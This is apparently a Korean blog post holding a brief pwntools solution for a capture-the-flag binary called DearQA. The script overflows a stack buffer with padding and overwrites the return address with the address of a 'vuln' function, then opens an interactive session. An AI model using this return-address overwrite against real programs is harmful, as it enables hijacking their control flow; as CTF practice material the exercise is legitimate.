본문 바로가기

호그와트

완전 심쿵 ♡

728x90

 

from pwn import *

 

context.binary = binary = "./DearQA.DearQA"
 
static = ELF(binary)

 

vuln_address = static.symbols.vuln
 
vuln_addr = p64(vuln_address)
 
payload = b'a'*32 + b'b'*8 + vuln_addr

 

p = process('./DearQA.DearQA')
 
p.sendline(payload)
 

p.interactive()

728x90

'호그와트' 카테고리의 다른 글

사피엔스의 이해  (2) 2022.10.20
랜덤게임 좋아하세요?  (2) 2022.10.04
논리적으로 답을 도출하기  (0) 2022.09.22
드림핵 basic  (1) 2022.08.25
직관에 부합하면서 직관을 벗어나는 답  (0) 2022.08.23